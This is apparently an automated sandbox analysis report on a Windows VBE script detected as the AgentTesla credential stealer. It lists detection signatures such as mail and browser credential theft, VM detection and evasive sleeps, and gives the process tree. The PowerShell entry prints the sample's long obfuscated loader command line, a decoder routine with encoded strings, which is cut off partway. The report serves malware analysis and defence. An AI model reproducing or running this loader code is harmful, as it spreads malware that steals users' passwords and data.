Edit tour
Windows
Analysis Report
transferencia.....vbe
Overview
General Information
Detection
AgentTesla
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Uses a known web browser user agent for HTTP communication
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 788 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\trans ferencia.. ...vbe" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - cmd.exe (PID: 6032 cmdline:
cmd /c ech o shell MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5792 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Ligh = "" "BlFUfuHan NycButVoiS aoSpnOu My HFdTUbBSv Sv{Sk Vt S p Af SkpSk aPrrOsaHom Tr(Su[NoSE ntBarLyiSp nNegLe]De` $BeuFoeTig KvePsnFonI myAdtOftKu iPh)Ud;me Ak`$KaECik GesShaHomU n Ki=Sy es 'Pr'No;Ki UnWTrrFoiF atMieLo-Gr HEuoBosNut St Pa`$ciE RnkUnsUdaI mmFe;Ca Be WCorMaiSet PleMu-SpHU noGesEntLo Ru`$WeECo kCesAcaSpm Ma;Fo SkWS yrMaiaftDo eUr-SkHOpo SksPltpr A d`$CaEMekA lsShaTamUd ;In Si Si Di St`$FlU SonsehdiaW asTitMaiLs Fi=Ce VeN CheBrwSt-t yOPrbAfjBr eEncBltdi LibSoyArtB aeSp[No]No To(Ca`$An uEveFagQue DenAvnAlyD itArtShiSe .MeLAreMin tegHotUphO v Fo/Mo Fl 2Br)Pr;Ta Fo Io Ko W iFPioPorAs (ni`$AmMGe ePlnPadGei SpcanpNilF iaTinBatLa 2Ov1Du6Sl= Hr0Te;so f a`$FoMPleO rnKodToiOv cKrpTalpea BanPatCh2B o1Di6Se Ca -DolBrtsi sy`$GuuMee VagUnePand inHaysmtFl tTaiQu.ArL AreAfnTigb etUnhSe;Op ma`$beMFa eLinPrdMoi TucBapSelT rahanEgtub 2Ly1Ak6Sy+ Un=No2Di)u m{Ar So Is Om Sp Sk Ra Tr In`$ haUTanSahU haAgsThtUn iIn[Ha`$do MSteKnnBod FoiTucImpD ilsvaRanBi tho2Ph1Br6 Fo/Ol2ta]B e Fe=Ma Ok [KucGroDin MivBreCarV itAc]In:Up :FrTHeoBaB ReyMitKoeJ e(ba`$AkuS keSkgAueTe nOunEkyMit RetEuiNo.O pSSluBebFi sAgtHirGoi HynTigTr(U n`$UsMgreu nnVedHeiSn cBrpSelDra AvnGotNo2O a1Jo6To,Na Bo2Sk)Ti, Ka Gr1Fo6B a)Kv;Th St Br`$PeUEj nWhhThaChs HetSpiEn[r i`$SpMSieB rnTadAaica cDepTylUna GanHotDi2S t1Ba6An/Ul 2Pr]De Ne= Lu En(Hy`$ TrUPonEahW iaFlsOttNo iSu[Mg`$Tr MBeePlnRed KuiSkcRepB ulSuaApnca tFo2Ov1od6 Un/Ti2St]E s Se-HebUn xFloArrCh Di2Re1Kl0K a)Wi;ae Ge Be Ru bu} Su Ro[CoSS ntNurHeiSp nPrgHv]st[ PnSYoyDesB etUdeAumBr .EqTDieTex SktEl.TiEV anRucGroHo dOmiAtnBig Uh]In:Su:G eAprSTrCCr IPeISl.FuG MieJutInSR etCarFoiAn nHygPu(Th` $FrUPenMuh OxatisJitD eiNo)fy;Sv }Ex`$SapBa obilFraGgr BaiBlsCoaC atSmiUd0Br =MyHGeTBaB If Kr'Da8R e1MiAChBUu ABe1DuAPe6 EdBCo7LoBR eFSnFTaCTe BCe6PiBHoE udBReEKl'O v;Si`$BopA uotolSoaVi rLliBosBia JetSkiAu1G o=PiHOpTOs BBo Eu'Ko9 TeFPrBGeBB aBHv1OnASe 0ToBUsDAgA Si1MiBSmDc yBRe4StABu 6PuFJaCSo8 Ar5HaBTeBV iBReCMoESu 1ReESy0FoF naCVi8No7D iBMeCBeATe 1YeBHu3MiB De4FlBMu7S o9VeCOcBFl 3reARe6SaB BrBPrAPr4s tBBr7Sa9Tr FTeBUn7SoA ag6NaBKvAA sBChDBaBCu 6spAUl1An' Sa;As`$Unp CroBrlOpaR erOpiTosFi aEntLeiDe2 An=ReHhuTR eBhu Au'Ch 9Th5AfBTh7 SiAMi6ko8G a2OrAMi0Ti BCuDKnBOu1 Ud9To3MiBb a6BaBRe6Te AFr0TaBOp7 ElAVa1PrAA l1Br'Mi;sp `$BopIdoUn lInaCarMai MesKaaUntL eiAu3Va=So HPeTBeBMi Fl'Pe8Hi1S tABrBOuAje 1hyALe6MoB Gu7unBReFN oFLyCGo8Eq 0FaAef7UdB FoCsaAVe6t oBGrBPaBst FPrBba7BeF InCDe9SlBS tBFaCTrAIn 6NoBsk7PlA Ti0ScBLoDM aASh2Sa8Ti 1AnBNi7WrA un0deAHy4P rBAlBMiBAn 1OvBOr7AfA op1AdFFoCA b9InACaBDi 3VaBClCPhB lo6MoBRoES jBUb7So8Ma 0BuBRo7ArB Fi4Do'Tr;G l`$IlpCroS ulDraAkrDi iloslgaPrt FoiEr4Ko=S